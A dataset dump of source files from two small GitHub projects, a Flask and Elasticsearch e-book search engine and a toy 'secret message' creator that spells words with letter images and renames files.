}}</a></li>\n {% endif %}\n\n {% endfor %}\n{% endfor %}\n</div>\n</html>\n"
},
{
"alpha_fraction": 0.5795121788978577,
"alphanum_fraction": 0.5924389958381653,
"avg_line_length": 34.60714340209961,
"blob_id": "4046355d4b0dd7f83403ea53ecf45e7047f8aa2e",
"content_id": "4397678346b1d63c70ff162e11dcde2705d8c451",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4100,
"license_type": "no_license",
"max_line_length": 141,
"num_lines": 112,
"path": "/server.py",
"repo_name": "Aishwarya20/be-project-search-engine",
"src_encoding": "UTF-8",
"text": "#back-end : The clustering module is first invoked\r\n#front-end server side script to help bring together the various modules\r\n#two tabs search by conetent and search by author/book title exist. For both the modules separate vocabulary for quicker front end validation\r\n#elasticsearch is invoked to perform searching on the ingested documents\r\n#doc.html->this page displays retrieves the search result(ninja template)\r\n#query.html->this shall take the query and pass it to text segment, spell check as well as language modelling\r\nimport spell_check as sc\r\nimport text_segment as ts\r\nimport language_model as lm\r\nfrom flask import Flask\r\nfrom flask import request\r\nfrom flask import render_template,send_from_directory\r\nimport string\r\nimport re\r\nfrom nltk.corpus import stopwords\r\nfrom collections import Counter\r\nfrom elasticsearch import Elasticsearch\r\nimport sys\r\nimport extract_books as eb\r\nstopword=set(stopwords.words(\"english\"))\r\nes=Elasticsearch()\r\napp = Flask(__name__,static_folder='js',template_folder='template')\r\n\r\[email protected]('/js/<path:path>/')\r\ndef static_page(page_name):\r\n return send_from_directory('js' ,path)\r\n\r\[email protected]('/',methods=[\"GET\",\"POST\"])\r\ndef process_author():\r\n\r\n answer1=' '.join(i for i in sc.display_author(request.form['query_author'].lower()))\r\n print answer1\r\n\r\n answer2=ts.display_segment_author(answer1)\r\n print answer2\r\n\r\n final=lm.display_lang_author(answer2)\r\n dloads=[]\r\n keys=[]\r\n error=\"\"\r\n if final == \"\":\r\n error=\"No results to found\"\r\n else:\r\n tokens=re.findall(\"[a-zA-Z']+\",final.lower())\r\n new_tokens=list(set(tokens)-stopword)\r\n new_final=' '.join(new_tokens)\r\n res=es.search(index=\"top100\",body={\"query\":{\"bool\":\r\n {\"should\":\r\n [{\"match\":{\"author\":new_final}},\r\n {\"match\":{\"title\":new_final}}\r\n ],\r\n \"minimum_should_match\" : 1\r\n }\r\n }})\r\n\r\n for hit in res['hits']['hits']:\r\n keys.append(hit['_source']['title'])\r\n dloads.append(\"http://127.0.0.1:5000/js/Dataset-1/\"+hit['_source']['bookname'])\r\n\r\n\r\n\r\n return render_template('doc.html',dloads=dloads,keys=keys,query=final,error=error)\r\n\r\n #return '<br>'.join(s2.extract_book_path(final))\r\n\r\[email protected]('/query.html',methods=[\"GET\",\"POST\"])\r\ndef process_content():\r\n\r\n answer_content1=' '.join(i for i in sc.display_content(request.form['query_content'].lower()))\r\n print answer_content1\r\n answer_content2=ts.display_segment_content(answer_content1)\r\n print answer_content2\r\n final_content=lm.display_lang_content(answer_content2)\r\n dloads={}\r\n keys={}\r\n error=\"\"\r\n count={}\r\n if final_content == \"\":\r\n error= \"No results to found\"\r\n else:\r\n tokens=re.findall(\"[a-zA-Z']+\",final_content.lower())\r\n new_tokens=list(set(tokens)-stopword)\r\n new_final_content=' '.join(new_tokens)\r\n\r\n res=es.search(index=\"top100\",body={\"query\":\r\n {\"match\":{\"text\":new_final_content}},\r\n })\r\n flag=[]\r\n n_clusters=[]\r\n for hit in res['hits']['hits']:\r\n n_clusters.append(hit['_source']['cluster'])\r\n count=Counter(n_clusters)\r\n for key in count:\r\n dloads[key]=[]\r\n keys[key]=[]\r\n for i in range(0,len(res['hits']['hits'])):\r\n flag.append(False)\r\n for hit1 in res['hits']['hits']:\r\n i=0\r\n for hit2 in res['hits']['hits']:\r\n if hit1['_source']['cluster'] == hit2['_source']['cluster'] and flag[i] == False:\r\n dloads[hit1['_source']['cluster']].append(\"http://127.0.0.1:5000/js/Dataset-1/\"+hit2['_source']['bookname'])\r\n keys[hit1['_source']['cluster']].append(hit2['_source']['title'])\r\n flag[i]=True\r\n i=i+1\r\n\r\n return render_template('content.html',dloads=dloads,keys=keys,count=count,query=final_content,error=error)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n"
},
{
"alpha_fraction": 0.7776097059249878,
"alphanum_fraction": 0.7965204119682312,
"avg_line_length": 65.0999984741211,
"blob_id": "40b1e34fbb67cb1965326d8e0c250293777871e5",
"content_id": "e838d5abdd6758962ab01828ee6d392fd5714b31",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1322,
"license_type": "no_license",
"max_line_length": 178,
"num_lines": 20,
"path": "/README.md",
"repo_name": "Aishwarya20/be-project-search-engine",
"src_encoding": "UTF-8",
"text": "Search Engine For an E-book Portal\n\nFollowing are the modules implemented\n1. Spell Checker: This helps correct spelling using the edit distance method\n2.Text Segmentation: Segments the text using the bigram model\n3.Language Modelling: Corrects the sequence of words to the most cooherent using the bigram model\n\nNote: In cluster_text.py : the path for storing the csv and json files,requried to form the chord diagram, has been hardcoded to the js directory ensure to change it to your path\nin your directory. (Line number:251,255,258,268,274)\n\nPre-requisites to the project:\n1. Ensure the files-extract_books,cluster_text,spell_check,language_model,text_segment are in the same folder as server.py\n2.The folders Dataset-1,js,static and template must be loacted where server.py is\n3. Remember to copy your dataset into js folder, else the documents won't download.\n\nRunning the project\n1. We first run cluster_text.py to form the clusters for the given dataset. This may require several re-runs but once the \nresult converges we save it as a model using joblib. cluster_text.py run as python cluster_text.py \"path_to_dataset\"\n2. We then ingest the documents along with the clustering information by running ingest.py as python ingest.py \"path_to_dataset\"\n3. Finally, we run server.py as python server.py \"path_to_dataset\"\n"
},
{
"alpha_fraction": 0.5646575093269348,
"alphanum_fraction": 0.5797260403633118,
"avg_line_length": 35.138614654541016,
"blob_id": "c2ff5e656297351c053c0b9c91c21f449fc600af",
"content_id": "fcbc30431e0d0b7de66098fa134ce82d160fce0a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3650,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 101,
"path": "/ingest.py",
"repo_name": "Aishwarya20/be-project-search-engine",
"src_encoding": "UTF-8",
"text": "import os\nimport re\nimport sys\nfrom datetime import datetime\nfrom elasticsearch import Elasticsearch\nimport codecs\nes = Elasticsearch()\n\ndef extract_title_author(file_name):\n contents = open(file_name).read()\n title_re = re.compile(r\"Title\\:.+\")\n author_re = re.compile(r\"Author\\:.+\")\n\n title_match = title_re.search(contents)\n author_match = author_re.search(contents)\n\n title = \"\"\n author = \"\"\n\n if title_match:\n title = title_match.group()\n title = title.strip().replace(\"Title: \", \"\")\n\n if author_match:\n author = author_match.group()\n author = author.strip().replace(\"Author: \", \"\")\n\n return (title, author)\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n dir_to_process = sys.argv[1]\n else:\n print \"Please specify input directory\"\n sys.exit(-1)\n\n file_to_save = open(\"authors.txt\", \"w\")\n ebook_cluster={}\n with open(\"doc_to_cluster_map.csv\") as csv_file:\n for row in csv_file:\n value,index= row.split(',')\n #print value,index\n ebook_cluster[index.replace(\"\\n\",\"\")]=value\n #print ebook_cluster\n\n\n\n info = {\n \"1jcfs10.txt\": {\"title\": \"The History of the Thirty Years' War\", \"author\": \"Friedrich Schiller\"},\n \"10028.txt\":{\"title\":\"Spalding's Official Baseball Guide - 1913\",\"author\":\"John B. Foster\"},\n \"allry10.txt\":{\"title\":\"Contributions to All The Year Round\",\"author\":\"Charles Dickens\"},\n \"balen10.txt\":{\"title\":\"The Tale of Balen\",\"author\":\"Algernon Charles Swinburne\"},\n \"baleng2.txt\":{\"title\":\"Ancient Poems,Ballads and Songs of the Peasantry of England\",\"author\":\"Robert Bell\"},\n \"batlf10.txt\":{\"title\":\"The Battle of Life\",\"author\":\"Charles Dickens\"},\n \"bgopr10.txt\":{\"title\":\"The Beggar's Opera\",\"author\":\"John Gay\"},\n \"bstjg10.txt\":{\"title\":\"Beast in the Jungle\",\"author\":\"Henry James\"},\n \"crsnk10.txt\":{\"title\":\"The Cruise of the Snark\",\"author\":\"Jack London\"},\n \"mklmt10.txt\":{\"title\":\"the Makaloa Mat/Island Tales\",\"author\":\"London\"},\n \"mspcd10.txt\":{\"title\":\"Miscellaneous Papers\",\"author\":\"Charles Dickens\"},\n \"rlsl110.txt\":{\"title\":\"The Letters of Robert Louis Stevenson\",\"author\":\"Robert Louis Stevenson\"},\n \"rlsl210.txt\":{\"title\":\"Letters of Robert Louis Stevenson\",\"author\":\"Robert Louis Stevenson\"},\n \"sesli10.txt\":{\"title\":\"Sesame and Lilies\",\"author\":\"John Ruskin\"},\n \"svyrd10.txt\":{\"title\":\"Songs of a Savoyard\",\"author\":\"W. S. Gilbert\"},\n \"utrkj10.txt\":{\"title\":\"Unbeaten Tracks in Japan\",\"author\":\"Bird\"},\n \"vpasm10.txt\":{\"title\":\"Vailima Prayers & Sabbath Morn\",\"author\":\"Robert Louis Stevenson\"},\n \"wldsp10.txt\":{\"title\":\"Shorter Prose Pieces\",\"author\":\"Oscar Wilde\"},\n \"zncli10.txt\":{\"title\":\"The Zincali\",\"author\":\"George Borrow\"}}\n\n for current_doc_id, current_file in enumerate(os.listdir(dir_to_process)):\n\n # Skip Hidden Files\n if current_file[0] == \".\":\n continue\n\n if current_file in info:\n data = info[current_file]\n title = data[\"title\"]\n author = data[\"author\"]\n else:\n title, author = extract_title_author(\n os.path.join(dir_to_process, current_file))\n\n doc = {\n 'author': author.lower(),\n 'title': title.lower(),\n 'bookname':current_file,\n 'text': codecs.open(os.path.join(dir_to_process, current_file), \"r\",encoding='utf-8', errors='ignore').read(),\n 'timestamp': datetime.now(),\n 'cluster':ebook_cluster[current_file]\n }\n\n rec = \"%s\\n\" % author\n file_to_save.write(rec)\n\n try:\n res = es.index(index=\"top100\", doc_type='ebook', id=current_doc_id, body=doc)\n print res['created'],current_file\n\n\n except:\n print \"Cannot index:%s\" % current_file\n"
},
{
"alpha_fraction": 0.603073000907898,
"alphanum_fraction": 0.606914222240448,
"avg_line_length": 27.925926208496094,
"blob_id": "26d18ee6cf592c87701ed8fd6a55a5fb210eb685",
"content_id": "90e1f357d5ca357916ee2fb007cce1497d3a5584",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1562,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 54,
"path": "/extract_books.py",
"repo_name": "Aishwarya20/be-project-search-engine",
"src_encoding": "UTF-8",
"text": "# extract names of books and corresponding authors.\n#author variable holds all the information regarding book titles and author\nimport re\nimport string\nimport os\nimport codecs\nimport json\nimport sys\n\n\ndef get_files(raw_path):\n files_extracted=[]\n root_extracted=[]\n print (\"Files in: \" +raw_path)\n root_extracted.append(raw_path)\n for current_doc_id, current_file in enumerate(os.listdir(raw_path)):\n files_extracted.append(current_file)\n return files_extracted,root_extracted\n\n\n\ndef main(args):\n dir_to_process=args\n files,roots=get_files(dir_to_process)\n info=[]\n books=[]\n string_content=''\n\n for root in roots:\n for filename in files:\n with codecs.open(root+'\\\\'+filename, \"r\",encoding='utf-8', errors='ignore') as file_name:\n text=file_name.readline()\n string_content +='\\n'+file_name.read()\n info.append(text.lower())\n book_info=''\n\n non_useful=['project',\"gutenberg's\",'ebooks','etexts','etext','ebook','gutenberg','this','presented','file','s']\n result=[word for word in re.findall('[a-z0-9]+',text.lower()) if word not in non_useful]\n\n book_info=' '.join(result)\n book_info=re.sub(\"of\",\"\",book_info,count=1).strip()\n books.append(book_info)\n\n #print books\n #print book_info\n author='\\n'.join(books)\n return author,string_content\n\n\n\n\nauthor,content=main(sys.argv[1])\nif __name__=='__main__':\n author,content=main(sys.argv[1])\n"
}
] | 6 |
pesix2500/learning
|
https://github.com/pesix2500/learning
|
e860b5802674c6f7bd729e4e964fe69a2ee1b57b
|
629b2b98ec53df06ced529a11e57d10f6211e2b3
|
92b0d2b2a0dd86a1079a9ee0988538690cdc6f6e
|
refs/heads/master
| 2018-02-07T08:01:42.149345 | 2017-11-02T06:05:41 | 2017-11-02T06:05:41 | 57,002,586 | 0 | 0 | null | 2016-04-25T01:15:47 | 2018-11-17T14:06:32 | 2018-11-17T14:06:31 |
Python
|
[
{
"alpha_fraction": 0.5767898559570312,
"alphanum_fraction": 0.5946882367134094,
"avg_line_length": 21.016948699951172,
"blob_id": "d7600c5cd5d1bebde77fa0908d3a75ab627066c7",
"content_id": "2997366fc4f1e09e6adea61789ad156a365ef6d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6040,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 236,
"path": "/cookpython/cook.py",
"repo_name": "pesix2500/learning",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n#-*- coding:utf-8 -*-\n\nimport os\nimport sys\nimport string\nimport time\n\nimport argparse\n\n\ndef func1():\n \"\"\"\n 用%(var)s 和 vars()来获取当前局部名称空间的可见元素\n \"\"\"\n book = 'libray'\n pages = 32\n scripts = 250\n print('the %(book)s has more than %(pages)s pages and %(scripts)s scripts' % vars())\n\n\n\ndef func2():\n #在函数内部定义类也是可以的啊\n class F2Class:\n pass\n \"\"\"\n 用type或者isinstance来获取当前对象的类型\n \"\"\"\n print(isinstance('string', str))\n print(type('string') == str)\n print(isinstance(100, int))\n print(type(100) == int)\n print(isinstance(7.89, float))\n\n obj = F2Class()\n print(type(obj) == F2Class)\n print(isinstance(obj, F2Class))\n\n\ndef func3():\n \"\"\"\n eval将一个字符串作为函数表达式进行求值\n \"\"\"\n expressions = [\"1\",\n \"1+1\",\n \"len('world')\",\n \"'string'\"\n ]\n for e in expressions:\n print(eval(e))\n\n\ndef func4():\n '''\n eval 函数只针对简单的表达式. 如果要处理大块的代码, 可以使用 compile 和 exec 函数\n compile(source, filename, mode)\n source:字符串\n filename:代码文件名称,如果不是从文件读取代码则随便传递一些可辨认的值。\n model:指定编译代码的种类。可以指定为 ‘exec’,’eval’,’single’。\n '''\n str = \"for i in range(0,10): print(i)\" \n c = compile(str,'<code>','exec') # 编译为字节代码对象 \n exec(c) \n\n # 直接执行也无压力啊\n exec(str) \n\n #python3 移除了execfile函数,可以通过下边方式执行外部py文件\n with open('test.py','r') as fd:\n exec(fd.read())\n\n\n\ndef func5():\n #listdir 获取指定文件夹下的文件列表\n for file in os.listdir(os.getcwd()):\n print(file)\n\n #获取当前目录\n cwd = os.getcwd()\n print('current dir is %s'%cwd)\n\n #跳转目录\n os.chdir(os.pardir)\n print('current dir is %s'%os.getcwd())\n\n\n\ndef func6():\n #os.makedirs() 可以创建多层目录\n os.makedirs('test1/test2/test3/test4/test5')\n fp = open('test1/test2/test3/test4/test5/file.txt','w')\n fp.write(\"This is a string\")\n fp.close()\n\n #os.remove() 删除文件\n os.remove('test1/test2/test3/test4/test5/file.txt')\n #os.removedirs() 多级删除文件夹,从test5开始,如果成功就上一层\n #直到指定的最上一层\n os.removedirs('test1/test2/test3/test4/test5')\n\n #mkdir和rmdir只能针对单层目录\n os.mkdir('folder')\n os.rmdir('folder')\n\n\ndef func7():\n\n #os.remove()删除指定文件\n print('create a newfile.txt...')\n fp = open('newfile.txt','w')\n fp.write(\"This is a string\")\n fp.close()\n for file in os.listdir(os.getcwd()):\n print(file)\n\n print('remove a newfile.txt...')\n os.remove('newfile.txt')\n for file in os.listdir(os.getcwd()):\n print(file)\n\n #用os.rename()改文件名\n txt = 'test.txt'\n txtnew = 'textnew.txt'\n print('rename test to testnew.txt')\n os.rename(txt,txtnew)\n for file in os.listdir(os.getcwd()):\n print(file)\n print('rename testnew.txt to test.txt')\n os.rename(txtnew,txt)\n for file in os.listdir(os.getcwd()):\n print(file)\n\n\ndef func8():\n '''\n os.stat()获取文件的各种属性\n '''\n file = 'test.txt'\n st = os.stat(file)\n print(st)\n\n mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime = st\n print(\"size is :\", size)\n print(\"created at :\", time.ctime(ctime))\n print(\"last accessed: \", time.ctime(atime))\n print(\"last modified:\", time.ctime(mtime))\n\ndef func9():\n #os.name 获取当前操作系统的类型\n #os.system执行外部命令\n print(os.name)\n if os.name == 'nt':\n command = 'dir'\n else:\n command = 'ls -l'\n os.system(command)\n\ndef func10():\n #使用os.path进行路径处理\n filename = 'my/little/pony.exe'\n print(os.path.split(filename)) #只分割出最后一项和前边两大部分\n print(os.path.splitext(filename)) #用于分割扩展名\n print(os.path.dirname(filename))\n print(os.path.basename(filename))\n print(os.path.join(os.getcwd(),os.path.dirname(filename),os.path.basename(filename)))\n\n print(os.path.exists('test.txt'))\n print(os.path.isabs('my/little/pony')) #判断是否是绝对路径\n print(os.path.isabs('/root/user/bin'))\n print(os.path.isdir('my'))\n os.mkdir('my')\n print(os.path.isdir('my'))\n os.rmdir('my')\n\n #os.path.expandvars 可以把路径字符串中的环境变量扩展开来\n os.environ['USER_TEST'] = 'charlie'\n print(os.path.expandvars('/home/$USER_TEST/config'))\n\n\ndef func11():\n #使用os.walk遍历文件系统\n path = r'C:\\Windows\\Web'\n #分别是当前扫描的路径,该路径下的子文件夹列表,该路径下的文件列表\n for root , dirs, files in os.walk(path):\n print(root,dirs,files)\n\n #对比listdir,listdir只是扫描当前路径\n for file in os.listdir(path):\n print(file)\n\n #通过只看files,可以遍历到所有的实体文件\n for (root,dirs,files) in os.walk(path):\n for file in files:\n fullname = os.path.join(root,file)\n print(fullname)\n\n\n\ndef func12():\n text = \"Hello my beatifual world, I am Trump\"\n print(text.upper())\n print(text.lower())\n print(text.split())\n print('-'.join(text.split()))\n print(text.replace('Trump','Clinton'))\n\n print(int('100'))\n print(int('100',8))\n print(int('100',16))\n print(float('3.1416926'))\n\n\n\n\n\n\n \n\n\n\n\n\n# cook main function\ndef cook_main(argv):\n parser = argparse.ArgumentParser(usage='%(prog)s no (e.g. 1,2,3..)')\n parser.add_argument('no', type=int, choices=range(1, 1000), help='cook number (1,2,3..)')\n args = parser.parse_args()\n\n function = 'func' + str(args.no)\n eval(function)()\n\n\nif __name__ == '__main__':\n sys.exit(cook_main(sys.argv))\n"
},
{
"alpha_fraction": 0.7009108066558838,
"alphanum_fraction": 0.7070536017417908,
"avg_line_length": 37.64754104614258,
"blob_id": "0f485b85c2364f2d6f18757a8f27f025458764d4",
"content_id": "d4f8adc1d802dfab8114b615528d348c1df6bfc8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 4721,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 122,
"path": "/english/words.rst",
"repo_name": "pesix2500/learning",
"src_encoding": "UTF-8",
"text": "\n****************************************************\nEnglish New Words\n****************************************************\n\n\n\n2016-7-29 \n============\n* breed\n\n - If you breed animals or plants, you keep them for the purpose of producing more animals or plants with paticular qualities, in a controlled way.\n - Agile itself is just a newer, best-of-breed collection of methodologies used to develop and maintain software.\n\n* complicate\n\n - To **complicate** something means to make it more difficult to understand or deal with.\n - As the amount of code grew and became more and more complicated, this method was obviously too risky and expensive an approach to software development.\n\n* despite\n\n - You use despite to introduce a fact which makes the other part of the sentence surprising.\n - Despite the bad weather and ill health, he took first place in the foot rece.\n - Despite wide adoption and continued use, however, waterfall model has some problems.\n\n* squeeze\n\n - If you squeeze something, you press it firmly, usually with your hands\n - if you squeeze a liquid or a soft substance out of an object, you get the liquid or substance out by pressing the object.\n - He said government cuts coupled with a squeeze on bank credit had suppressed growth.\n\n* creep\n\n - If somthing creeps somewhere, it moves very slowly.\n - There software changes in scope add up -- an effect known as scope creep.\n\n* respective\n\n - **Respective** means relating or belonging separately to the individual people you have just mentioned.\n - Steve and I were at very different stages in our respective careers.\n - Competent authorities of various trades shall be in charge of the product quality control in their respective systems.\n\n* \n* \n* \n\n\n2016-07-27 \n=================\n\n* violate\n\n - For cloud project, there are two very important rules which can not be violated.\n - If someone **violates** an agreement, law, or promise, they break it.\n - They went to prison because they viloated the law.\n* claim\n\n - If you say that someone **claims that** something is true, you mean they say that is true but you are not sure whether or not they are telling the truth.\n - He claimed that it was all conspiracy against him.\n - He claims a 70 to 80 percent success rate.\n\n* clarify\n\n - To **clarify** something means to make it easier to understand, usually by explaining it in more detail.\n - A bank spokesman was unable to clarify the situation.\n - If there are some uncertainty for the supporting scenarios, we need to study and clarify them.\n\n* boundary\n\n - The boundary of an area of land is an imaginary line that seprates it from other areas.\n\n* potential\n\n - You use potential to say that someone or something is capable of developing into the particular kind of person or thing mentioned.\n - The firm has identified 60 potential customers at home and abroad.\n - Please continue to check scan report and fix potential issues.\n\n* legacy\n\n - A legacy is money or property which someone leaves to you when they die.\n - For legacy program, you should do code review.\n\n* migration\n\n - If people migrate, the move from one place to another, especially in order to find work or to live somewhere for a short time.\n - The fact of changing from one computer system to another.\n - The wizard will prompt you to save a backup copy of your project before migration.\n\n* nominate\n\n - If someone is nominated for a job or position, their name is formally suggested as a candidate for it.\n - If someone or somthin such as an actor or a film **is nominated** for an award, someone formally suggests that they should be given that award.\n - Practically every movie he made was nominated for an Oscar.\n\n + Practically means almost, but not completely or exactly.\n\n* retrospective\n\n - A **retrospective** is an exhibition or showing of work done by an artist over many years, rather than his or her most recent work.\n - Retrospective meeting \n\n* swimlane\n\n - A swimlane is a process role, which is usally assigned to a group of users.\n\n* diverse\n\n - if a group or range of things is **diverse**, it is made up of a wide variety of things.\n - He said he has never seen so many diverse views gathered together to **tackle** the problem.\n\n + If you **tackle** a diffcult problem or task, you deal with it in a very determined or efficient way\n + The first reason to tackle these problems is to save children's lives.\n\n\n\n2016-06-01 \n=============\n* inspire\n\n - If someone or something inspires you to do something new or unusual, they make you want to do it.\n - Leadership means that the person\n* \n* \n\n\n\n\n"
},
{
"alpha_fraction": 0.6231883764266968,
"alphanum_fraction": 0.6521739363670349,
"avg_line_length": 22,
"blob_id": "cd448ab05894e539649ff4fe0b37a6b73d2d584a",
"content_id": "4f674bb6360252cc183b69a9cd1a1fd76c42e38e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 69,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 3,
"path": "/cookpython/test.py",
"repo_name": "pesix2500/learning",
"src_encoding": "UTF-8",
"text": "print(\"This is a test python file\")\nfor i in range(10):\n print(i)\n"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 16.5,
"blob_id": "73e7cdfa564f654b1ab0331adc31734b8b410b2b",
"content_id": "4a58d83b6a40aecdbdc54d24d3526b624daff48b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 35,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 2,
"path": "/README.md",
"repo_name": "pesix2500/learning",
"src_encoding": "UTF-8",
"text": "# learning\nlearning site for pesix\n"
}
] | 4 |
Akshith-Ranjan/Secret-Message-Creator
|
https://github.com/Akshith-Ranjan/Secret-Message-Creator
|
3f3410cf1ffd0c7a153634383c791efce299d18c
|
32dea5389f5db5fe05f353c635db1bdebf760f9d
|
fb685340b85258b7da6c95851e57cdf2b73d04fb
|
refs/heads/master
| 2021-08-22T08:31:20.586885 | 2017-11-29T18:46:27 | 2017-11-29T18:46:27 | 112,511,910 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6765754818916321,
"alphanum_fraction": 0.6896551847457886,
"avg_line_length": 29.035715103149414,
"blob_id": "cfb3ee94193fc751c4d32714eac3c32d62a3e4f1",
"content_id": "023e8eda4aa7c69f3488570658f479dcbdf6d536",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 841,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 28,
"path": "/decrypt.py",
"repo_name": "Akshith-Ranjan/Secret-Message-Creator",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport os\nimport shutil\nimport sys\n\nif os.path.isdir(r\"./decryptedMsg/\"):\n print \"Deleting existing encryptedMsg directory\"\n shutil.rmtree(r\"./decryptedMsg/\")\nprint \"Creating new directory named decryptedMsg\"\nos.mkdir(r\"./decryptedMsg/\")\n\nif os.path.isdir(r\"./encryptedMsg/\"):\n filenames = os.listdir(r\"./encryptedMsg/\")\n if len(filenames) < 1:\n print \"'encryptedMsg' directory is empty. Run encrypt.py to create an encrypted message\"\n print \"Exiting...\"\n sys.exit()\nelse:\n print \"'encryptedMsg' directory does not exist. Run encrypt.py to create a message\"\n print \"Exiting...\"\n sys.exit()\n\nfor filename in filenames:\n src = r\"./encryptedMsg/\"+filename\n dst = r\"./decryptedMsg/\" + filename.translate(None,\"0123456789\")\n shutil.copy(src, dst)\nprint \"Completed decrypting\"\n"
},
{
"alpha_fraction": 0.498934805393219,
"alphanum_fraction": 0.5279079675674438,
"avg_line_length": 19.059829711914062,
"blob_id": "7486cd52363e3cf4e9137455d2d115a28eb2a11a",
"content_id": "6e5993dc3e469dac47d7f25a9219a857293d25c7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2347,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 117,
"path": "/creator.py",
"repo_name": "Akshith-Ranjan/Secret-Message-Creator",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport os\nimport shutil\nimport sys\n\nmapping = {\n 'a': 0,\n 'b': 1,\n 'c': 2,\n 'd': 3,\n 'e': 4,\n 'f': 5,\n 'g': 6,\n 'h': 7,\n 'i': 8,\n 'j': 9,\n 'k': 10,\n 'l': 11,\n 'm': 12,\n 'n': 13,\n 'o': 14,\n 'p': 15,\n 'q': 16,\n 'r': 17,\n 's': 18,\n 't': 19,\n 'u': 20,\n 'v': 21,\n 'w': 22,\n 'x': 23,\n 'y': 24,\n 'z': 25,\n '.': 26,\n ' ': 27\n}\na = [\n 'athens.jpg',\n 'austin.jpg',\n 'bangalore.jpg',\n 'barcelona.jpg',\n 'beijing.jpg',\n 'berkeley.jpg',\n 'bogota.jpg',\n 'bristol.jpg',\n 'bucharest.jpg',\n 'buenos aires.jpg',\n 'cairo.jpg',\n 'chennai.jpg',\n 'chicago.jpg',\n 'colombo.jpg',\n 'dallas.jpg',\n 'delhi.jpg',\n 'edinbrugh.jpg',\n 'gainesville.jpg',\n 'houston.jpg',\n 'hyderabad.jpg',\n 'istanbul.jpg',\n 'ithaca.jpg',\n 'jacksonville.jpg',\n 'karachi.jpg',\n 'kiev.jpg',\n 'london.jpg',\n 'los angeles.jpg',\n 'madrid.jpg',\n 'manchester.jpg',\n 'miami.jpg',\n 'new york.jpg',\n 'oakland.jpg',\n 'pune.jpg',\n 'rochester.jpg',\n 'san diego.jpg',\n 'san jose.jpg',\n 'sao paulo.jpg',\n 'seattle.jpg',\n 'seoul.jpg',\n 'shanghai.jpg',\n 'singapore.jpg',\n 'sunnyvale.jpg',\n 'sydney.jpg',\n 'tel aviv.jpg',\n 'zimbabwe.jpg'\n]\n\n\nif os.path.isdir(r\"./alphabet\"):\n alpha_files = os.listdir(r\"./alphabet/\")\n if len(alpha_files) != 28:\n print \"All alphabet images dosent exist( 26 letters, '.' and ' ' )\"\n print \"exiting...\"\n sys.exit()\nelse:\n print \"Directory with all alphabet images dosent exist\"\n print \"exiting...\"\n sys.exit()\n\nif os.path.isdir(r\"./newMessage/\"):\n print \"Deleting existing 'newMessage' directory\"\n shutil.rmtree(r\"./newMessage/\")\nprint \"Creating new directory named newMessage\"\nos.mkdir(r\"./newMessage/\")\n\nmsg = input(\"Enter the new message ( Use quoates )( No numbers )\" +\n \"( max 42 char )\\n\")\nmsg = msg.lower().translate(None, \"0123456789\")\nmsg = (msg[:42] + '...') if len(msg) > 42 else msg\n\nprint \"The entered message is: \" + msg\ni = 0\nprint \"Creating message...\"\nfor letter in msg:\n src = r\"./alphabet/\"+alpha_files[mapping[letter]]\n dst = r\"./newMessage/\" + a[i]\n shutil.copy(src, dst)\n i = i + 1\nprint \"Go to './newMessage/' directory to see the message\"\nprint \"Completed\"\n"
},
{
"alpha_fraction": 0.7409766316413879,
"alphanum_fraction": 0.7409766316413879,
"avg_line_length": 25.16666603088379,
"blob_id": "e21575aa30e7b80b63192432b3660a3e4789f682",
"content_id": "de955e3b8be4c9aa8ad37a4d0762a76e3efecfd9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 471,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 18,
"path": "/README.md",
"repo_name": "Akshith-Ranjan/Secret-Message-Creator",
"src_encoding": "UTF-8",
"text": "# Secret-Message-Creator\nPython programs that can create a message using sequence of images, encrypt that message and decrypt the encrypted message.\n## Installation \n* [Python](https://www.python.org/downloads/)\n## Usage\n* Navigate to the program directory in a terminal\n* Run creator.py to create the message.\n```\npython creator.py\n```\n* Run encrypt.py to encrypt the message.\n```\npython encrypt.py\n```\n* Run decrypt.py to decrypt the message.\n```\npython decrpyt.py\n```\n"
},
{
"alpha_fraction": 0.6762589812278748,
"alphanum_fraction": 0.6810551285743713,
"avg_line_length": 27.758621215820312,
"blob_id": "bdb9907642b05565745c8f6bebe55cde3b651209",
"content_id": "e353639193b36cbab24c05b3f6ad17e94b878d75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 834,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 29,
"path": "/encrypt.py",
"repo_name": "Akshith-Ranjan/Secret-Message-Creator",
"src_encoding": "UTF-8",
